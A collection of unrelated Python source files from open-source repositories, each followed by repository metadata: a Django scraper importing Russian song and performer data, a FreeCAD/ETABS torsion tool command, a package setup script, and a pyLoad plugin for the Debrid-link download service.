return document
# function to import people names and addresses of pages which contain recordings and people data
def people():
return
lists = [
('http://kkre-1.narod.ru/komp.htm','composers','individual'),
('http://kkre-1.narod.ru/poet.htm','poets','individual'),
('http://kkre-1.narod.ru/pevi.htm','performers','individual female'),
('http://kkre-1.narod.ru/pevc.htm','performers','individual male'),
('http://krapp-sa.narod.ru/','performers','group'),
]
for address, category, comtype in lists:
print('fetching ' + address + ' (category: ' + category + ', type: ' + comtype+')')
# Type and subtype from combined type
type = comtype.split(' ')[0]
# Fetch and parse index page
content = UnicodeDammit(open(fetch(address)).read(), is_html=True).unicode_markup
doc = lxml.html.fromstring(content)
for link in doc.cssselect('a'):
# Ignore links that do not point to people pages
if link.get('href') == 'http://kkre-1.narod.ru/': continue
# Collect information and create a person record
name = link.text_content()
# Ensure that name is unique before going further
if len(name) == 1: # Special case for 'first-letter' multi-person pages
if address == 'http://kkre-1.narod.ru/pevi.htm': name = u'певицы на "' + name + '"'
elif address == 'http://kkre-1.narod.ru/pevc.htm': name = u'певцы на "' + name + '"'
# Check if name is already in database as 'kkre'-form ext_person_name
# If already present - take its person and add new categories and links (if any), if not - create
try:
person = models.ExtPersonName.objects.get(form='kkre', name=name).person
except models.ext_person_name.DoesNotExist:
# back up kkre name
name_kkre = name
# normalize name
name = re.sub('\s+', ' ', name) # multiple whitespaces
name = name.strip() # trim
# For individuals: put comma after non-shortable name part
# It's usually a first word, but if the part in brackets follows, it's included
if type == 'individual':
name_head = name.split(' ')[0]
name_tail = ''
flag_brackets = False
flag_head = True
for name_part in name.split(' ')[1:]:
# If we meet '('-beginning part - append everything till we find ')'-ending one
if name_part.startswith('('): flag_brackets = True
# If head still set and
if not (flag_brackets or name_part.lower() == u'оглы'): flag_head = False
# ')'
if flag_brackets and name_part.endswith(')'): flag_brackets=False
# It's a part of non-shortable name part
if flag_head: name_head = name_head + ' ' + name_part
# End of non-shortable name part, place comma here
else: name_tail = name_tail + ' ' + name_part
name = name_head + ',' + name_tail
# Restore current list subtype
# This code shouldn't be here
if len(comtype.split(' ')) < 2: subtype = ''
else: subtype = comtype.split(' ')[1]
if subtype == '': subtype = gender_from_name(name)
# person still can already exist, if it wasn't created with this script and has no ext_person_name kkre alias
person, created = models.Person.objects.get_or_create(name=name, type=type, subtype=subtype)
# create kkre original name alias
# this way we enshure that if we change person.name and re-run this script, duplicate with original kkre name won't be created
models.ExtPersonName.objects.create(form='kkre', name=name_kkre, person=person)
print '%s: %s' % (name, link.get('href'))
# Explicit categories
models.ExtPersonCategory.objects.get(category=category).people.add(person)
# Page address
href = link.get('href')
if href == 'http://kkre-2.narod.ru/gladkov.htm/': href = 'http://kkre-2.narod.ru/gladkov.htm'
elif href == 'http://kkre-48.narod.ru/chuev.htm/': href = 'http://kkre-48.narod.ru/chuev.htm'
page_link, created = models.ExtPersonLink.objects.get_or_create(href=href, format='kkre')
page_link.people.add(person)
# some fixes
# Вокальный квартет "Гая" -> вокально-инструментальный ансамбль "Гая"
# Ансамбль "Дружба" -> вокально-инструментальный ансамбль "Дружба"
for name, name_fix in {
u'Лазарев-Мильдон, Владимир Яковлевич':u'Лазарев (Лазарев-Мильдон), Владимир Яковлевич'
}:
person = models.person.objects.get(name=name)
person.name = name_fix
person.save()
# get text from lxml.html node from start till any non-allowed tag
# useful for parsing messy html (e. g. we know recording description line can contain italics and bold text, but there can be <br> inside <b> or <i>,
# and all text after that <br> is not a part of the description - so we call this function with allowedtags=['i','b'])
def inner_text_until_term(element, allowedtags, root=True):
# if it's a terminating tag - do not add any text and return a marker to stop
# however, be permissive if root is True (meaning this function instance if a root of the recursion tree, called for a root node, which han be any tag)
if not root and element.tag not in allowedtags: return '', True
# otherwise, add element text and start iterating its children
text = ''
if type(element.text) is unicode: text+=element.text
for child in element.getchildren():
text_frag, stop = inner_text_until_term(child, allowedtags, False)
text += text_frag
# if a child has returned stop marker - stop and return text with stop, too (this will propagate recursively)
if stop:
# if root is True, this is our final result and we return only a text (same in the end)
if not root: return text, True
else: return text
if type(element.tail) is unicode: text += element.tail
if not root: return text, False
else: return text
def outher_text_until_term(element, allowedtags):
stop = False
text = (element.tail if element.tail is not None else '')
text_frag = ''
while not stop and element.getnext() is not None:
element = element.getnext()
text += text_frag
text_frag, stop = inner_text_until_term(element, allowedtags, False)
return text
# import people photos and descriptions
def person_data(page_filename):
document = lxmlparse(page_filename)
data = {}
# get photo and description
for image in document.cssselect('img'):
# photo can be found by an img tag with image filename equal to page filename
if '.'.join(filename.split('/')[-1].split('.')[:-1])=='.'.join(image.get('src').split('/')[-1].split('.')[:-1]):
# first, we need to mirror the image
#image_link='/'.join(page_link.href.split('/')[:-1])+'/'+image.get('src')
data['image'] = image.get('src')
# description is in p next to this img
# or the only p between img and first recording link
# or the first p after <CENTER><H2>{{ name_short }}</CENTER></H2>
if image.getnext() is not None and image.getnext().tag == 'p':
data['text'] = inner_text_until_term(image.getnext(), ['br']).strip()
break
return data
# import recordings
def recordings(page_filename):
document = lxmlparse(page_filename)
recordings = []
# get all links
for link in document.cssselect('a'):
href = link.get('href')
title = link.text_content().strip()
legal_status = ''
# Filter recording links
# Audiofiles
if href is None: continue # mistyped <a> instead of </a>, http://kkre-34.narod.ru/monin/ulu.mp3
if not href[-4:] in ['.mp3', '.ogg', '.wma', '.wav', '.vqf']:
# melody.su links: let's assume there can be only one title on a one disk
# Problem: there are multi-line links for multiple recordings on a same disk
if 'melody.su' in href and href.split('melody.su')[1] not in ['', '/']:
href = href + '#' + title
legal_status = 'deleted'
# We might also want to set some flag indicating that recording is deleted by copyright holder
else: continue
description = outher_text_until_term(link, ['b', 'i']).strip()
print '%s: "%s" %s' % (href, title, description)
recordings.append({'href':href, 'title':title, 'description':description, 'legal_status':legal_status})
return recordings
def result_from_recording_description(description):
result = {}
# split description string into authors and performers
strings = {}
description = description.strip()
if not description: # empty description, but we can still use subjects list
print 'Warning: empty descripton'
elif description[0] == '(':
description = description.split(')')
if len(description) > 1:
description[0] = re.sub('^\s.\(', '', description[0])[1:].strip()
if '(' in description[0]:
print('Error: description string parse error 1')
return
description[0] = description[0].replace(u'―', u'-').replace(u'—', u'-').replace(u'–', u'-').replace(u'‒', u'-').replace(u'‑', u'-').replace(u'‐', u'-')
description[0] = description[0].split(' - ')
if len(description[0]) == 1:
strings['authors'] = description[0][0]
elif len(description[0]) == 2:
strings['composers'] = description[0][0]
strings['poets'] = description[0][1]
else:
print('Error: description string parse error 2')
return
description[1] = ')'.join(description[1:]).strip() # if there are other bracketed parts after authors
# if description[1] is not empty, it's a performers list
if description[1]:
strings['performers'] = description[1]
else: # begins with '(', but has no ')'
print('Error: description string parse error 3')
else: # no authors, all description is a performers list
if description:
strings['performers'] = description
for key in strings.keys():
# name list dividers
strings[key] = strings[key].replace(',', ';')
# in certain contexts 'и' is not a divider
# e. g. 'Хор ВР и ЦТ'
strings[key] = strings[key].replace(u' и ', ';')
# in certain contexts '/' is not a divider
# e. g. 'х/ф', 'п/у'
# let's assume all of them have '<start_of_line_or_whitespace><single_character>/<single_character><whitespace_or_end_of_line>' pattern,
# and any '/' out ot this pattern to be a name divider
# I failed to write a 'start_(end)_of_line or whitespace' expression in a regexp, so I add border whitespaces which will be trimmed later
strings[key] = ' ' + strings[key] + ' '
strings[key] = re.sub('(?<!\s\S)/', ';', re.sub('/(?!\S\s)', ';', strings[key]))
# create an empty result item
result[key] = {'flags':[], 'people':[], 'people_filtered':[]}
# split list into names and fill result item people list with them
result[key]['people'] = strings[key].split(';')
# clean up a little
result[key]['people'] = [re.sub('\s+', ' ', re.sub('\.\s*', '. ', name)).strip() for name in result[key]['people']]
# incomplete strings: if a string begins with 'with ...', it means its set must be completed with people from page subjects set,
# and people names in this string are given in instrumental case
for prefix in [u'с ', u'c ', u'со ', u'вместе с ', u'дуэт с ', u'в дуэте с ']:
if result[key]['people'][0].startswith(prefix):
result[key]['people'][0] = result[key]['people'][0][len(prefix):]
result[key]['flags'].append('incomplete')
# convert cases
import _ru_mystem_inflect
for idx in range(0, len(result[key]['people'])):
name_norm = _ru_mystem_inflect.name_instrumental_to_nominative(result[key]['people'][idx])
if name_norm is None:
print('Warning: case normalization failed for name "' + result[key]['people'][idx] + '"')
# add 'с ' prefix to the beginning of the name
else:
# if normalized name differs from original - add original form to people_filtered and replace it with normalized in people
if result[key]['people'][idx] != name_norm:
print('Info: case normalization: "' + result[key]['people'][idx] + '" -> "' + name_norm + '"')
result[key]['people_filtered'].append(result[key]['people'][idx])
result[key]['people'][idx] = name_norm
break
return result
|
shatsky/museion
|
management/commands/_import_kkre.py
|
Python
|
gpl-3.0
| 14,222
|
from pathlib import Path
from PySide2 import QtCore
import FreeCADGui as Gui
class CivilShowTorsion:
def GetResources(self):
menu_text = QtCore.QT_TRANSLATE_NOOP(
"civil_torsion",
"Torsion")
tooltip = QtCore.QT_TRANSLATE_NOOP(
"civil_torsion",
"Get Torsion of Structure")
path = str(
Path(__file__).parent.absolute().parent / "images" / "torsion.svg"
)
return {'Pixmap': path,
'MenuText': menu_text,
'ToolTip': tooltip}
def Activated(self):
from gui_civiltools.gui_check_legal import (
allowed_to_continue,
show_warning_about_number_of_use,
)
allow, check = allowed_to_continue(
'torsion.bin',
'https://gist.githubusercontent.com/ebrahimraeyat/d1591790a52a62b3e66bb70f45738105/raw',
'cfactor',
n=2,
)
if not allow:
return
from py_widget import torsion
import etabs_obj
etabs = etabs_obj.EtabsModel(backup=False)
if not etabs.success:
from PySide2.QtWidgets import QMessageBox
QMessageBox.warning(None, 'ETABS', 'Please open etabs file!')
return False
win = torsion.Form(etabs)
Gui.Control.showDialog(win)
show_warning_about_number_of_use(check)
def IsActive(self):
return True
|
ebrahimraeyat/civilTools
|
gui_civiltools/gui_show_torsion.py
|
Python
|
gpl-3.0
| 1,522
|
from setuptools import setup, find_packages
import sys, os
version = '1.1'
setup(name='raisin.mysqldb',
version=version,
description="",
long_description="""\
""",
classifiers=[], # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers
keywords='',
author='',
author_email='',
url='',
license='',
packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),
namespace_packages = ['raisin'],
include_package_data=True,
zip_safe=False,
install_requires=[
# -*- Extra requirements: -*-
],
entry_points="""
# -*- Entry points: -*-
""",
)
|
rna-seq/raisin.mysqldb
|
setup.py
|
Python
|
gpl-3.0
| 684
|
# -*- coding: utf-8 -*-
import time
import Crypto.Hash.SHA
import pycurl
from module.plugins.internal.misc import json
from module.plugins.internal.MultiHoster import MultiHoster
def args(**kwargs):
return kwargs
class DebridlinkFr(MultiHoster):
__name__ = "DebridlinkFr"
__type__ = "hoster"
__version__ = "0.02"
__status__ = "testing"
__pattern__ = r'^unmatchable$'
__config__ = [("activated", "bool", "Activated", True),
("use_premium", "bool", "Use premium account if available", True),
("fallback",
"bool",
"Fallback to free download if premium fails",
False),
("chk_filesize", "bool", "Check file size", True),
("max_wait", "int",
"Reconnect if waiting time is greater than minutes", 10),
("revert_failed", "bool", "Revert to standard download if fails", True)]
__description__ = """Debrid-slink.fr multi-hoster plugin"""
__license__ = "GPLv3"
__authors__ = [("GammaC0de", "nitzo2001[AT]yahoo[DOT]com")]
API_URL = "https://debrid-link.fr/api"
def api_request(self, method, data=None, get={}, post={}):
session = self.account.info['data'].get('session', None)
if session:
ts = str(int(time.time() - float(session['tsd'])))
sha1 = Crypto.Hash.SHA.new()
sha1.update(ts + method + session['key'])
sign = sha1.hexdigest()
self.req.http.c.setopt(pycurl.HTTPHEADER, ["X-DL-TOKEN: " + session['token'],
"X-DL-SIGN: " + sign,
"X-DL-TS: " + ts])
json_data = self.load(self.API_URL + method, get=get, post=post)
return json.loads(json_data)
def handle_premium(self, pyfile):
res = self.api_request("/downloader/add", post=args(link=pyfile.url))
if res['result'] == "OK":
self.link = res['value']['downloadLink']
pyfile.name = res['value'].get('filename', None) or pyfile.name
self.resume_download = res['value'].get(
'resume') or self.resume_download
self.chunk_limit = res['value'].get('chunk') or self.chunk_limit
|
rlindner81/pyload
|
module/plugins/hoster/DebridlinkFr.py
|
Python
|
gpl-3.0
| 2,327
|